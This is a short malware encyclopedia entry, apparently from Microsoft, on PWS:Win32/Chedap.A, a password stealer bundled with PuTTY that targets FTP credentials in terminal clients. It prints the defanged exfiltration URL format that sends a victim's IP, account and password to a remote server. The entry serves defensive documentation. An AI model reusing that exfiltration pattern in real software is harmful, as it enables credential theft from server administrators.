Home / malware PWS:Win32/Chedap.A
First posted on 02 February 2012.
Source: MicrosoftAliases :
There are no other names known for PWS:Win32/Chedap.A.
Explanation :
PWS:Win32/Chedap.A is a password stealer that targets FTP user accounts. The malware has been observed to be packaged with PuTTY; it targets FTP user accounts from a number of open source terminal emulators - including PuTTY, WinSCP and SSH Secure - that are often used by website and/or server administrators to maintain the server.
Top
PWS:Win32/Chedap.A is a password stealer that targets FTP user accounts. The malware has been observed to be packaged with PuTTY; it targets FTP user accounts from a number of open source terminal emulators - including PuTTY, WinSCP and SSH Secure - that are often used by website and/or server administrators to maintain the server.
When the user runs the FTP tool, PWS:Win32/Chedap.A silently records the user's credentials and sends the stolen information to a remote server in the following format:
hxxp://l.ip-163.com:88/yj33/js2.asp?act=add&user=<Victim IP>&pwd=<User Account>&ll1=<Password>=&ll2=22&ll3=<FTP Program name>
Using these stolen credentials, the attacker can easily compromise and control the victim's computer. An attacker can perform any number of different actions on an affected computer using PWS:Win32/Chedap.A. This could include, but is not limited to, the following actions:
- Download and execute arbitrary files
- Upload files
- Spread to other computers using various methods of propagation
- Log keystrokes or steal sensitive data
- Use the computer for botnet purposes
- Modify system settings
- Run or terminate applications
- Delete files
Analysis by Tim Liu
Last update 02 February 2012
